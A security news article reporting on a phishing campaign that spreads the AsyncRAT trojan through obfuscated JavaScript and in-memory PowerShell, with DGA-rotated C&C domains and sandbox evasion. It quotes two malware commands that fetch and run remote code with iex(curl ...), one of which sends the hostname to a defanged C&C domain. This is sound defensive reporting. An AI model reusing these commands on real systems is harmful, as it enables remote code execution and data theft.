For the past 11 months a threat group has been targeting employees in various companies with phishing emails that distribute an open-source trojan program called AsyncRAT. The targets included companies managing key infrastructure in the US.
According to AT&T’s Alien Labs cybersecurity division, the attackers’ command-and-control (C&C) infrastructure uses a domain generation algorithm (DGA) to rotate through a high number of domains to make traffic blocking harder. They always generate new samples of the malicious tool to evade detection. The researchers have identified more than 300 samples and 100 domains associated with this campaign.
“ââAsyncRAT is an open-source remote access tool released in 2019 and is still available in Github,” the researchers said in their report. “As with any remote access tool, it can be leveraged as a remote access trojan (RAT), especially in this case where it is free to access and use. For that reason, it is one of the most commonly used RATs; its characteristic elements include keylogging, exfiltration techniques, and/or initial access staging for final payload delivery.”
It is not unusual for even sophisticated threat actors to use open-source malware frameworks and tools. They provide several benefits such as low development costs compared to custom tools and plausible deniability since the tools are not associated with one actor. In fact, AsyncRAT itself was used in 2022 by an APT group that security firm Trend Micro tracks as Earth Berberoka or GamblingPuppet.
Highly obfuscated malware delivery scripts
The phishing emails seen by Alien Labs and other researchers including Microsoft’s Igal Lytzki used a thread hijacking technique to direct users to a phishing page, which eventually dropped a JavaScript (.js) file on users’ computers.
If opened in Notepad, the script contains a lot of random English words that are commented out, although variants that used Sanskrit characters have also been reported in the past by other researchers as part of other campaigns. The script is highly obfuscated with functions that hide and extract the actual malicious code from different parts of the file. The goal of the script is to download the second stage payload from an URL, which is itself encoded using a custom cipher and decimal values instead of ASCII characters.
The payload is another encoded script written in PowerShell that is executed directly in memory without being saved to disk with a “conhost –headless powershell iex(curl -useb sduyvzep[.]top/1.php?hash=)” command. The domain of the C&C server is rotated periodically.
The PowerShell script executes yet another PowerShell script by invoking the iex(curl -useb “http://sduyvzep[.]top/2.php?id=$env:computername&key=$wiqnfex”) command. This sends some information to the C&C server such as the computer hostname and a variable called $wiqnfex that indicates the likelihood of the computer being a virtual machine or sandbox. This value is set after the first performs a few checks for the system’s graphics card adapter and BIOS, which would be emulated in a VM.
If the C&C server determines the $wiqnfex indicates a valid target, the server deploys AsyncRAT. If the variable value indicates a possible VM or sandbox, it redirects the request to Google or to a different PowerShell script that downloads and launches a decoy RAT.
“When decompiled, the RAT is actually a distraction for any researchers looking into the campaign,” the Alien Lab researchers said. “The sample is a decoy made to resemble a RAT for several reasons. The assembly name is DecoyClient, and the configuration isnât encrypted as it would be in an AsyncRAT sample. Additionally, the sample does not contain a C&C server, only loopback addresses. Furthermore, among the data to be exfiltrated to the C&C, is the string ‘LOL’ or the group ‘GOVNO’.”
A new command-and-control domain every week
In addition to regularly randomizing the script code and malware samples to evade detection, the attackers also rotate the C&C domains every week. However, the Alien Lab researchers managed to reverse-engineer the domain generation algorithm, which together with several other constants such as the TLD (.top), registrar, and organization name used to register the domains, and were able to find the domains used in the past and obtain past samples of the deployment scripts.
“These domains have been observed to carry the same features as mentioned before, with the difference of being 15 characters long,” the researchers said. “This allows us to pivot and find historical samples based off the DGA, as well as build detections to identify future infrastructure despite all their efforts to evade EDR and static detections.” The AT&T Alien Labs report includes detection signatures for this campaign that can be used with the open-source Suricata intrusion detection system as well as a list of indicators of compromise (IOC) that can be used to build detections for other systems.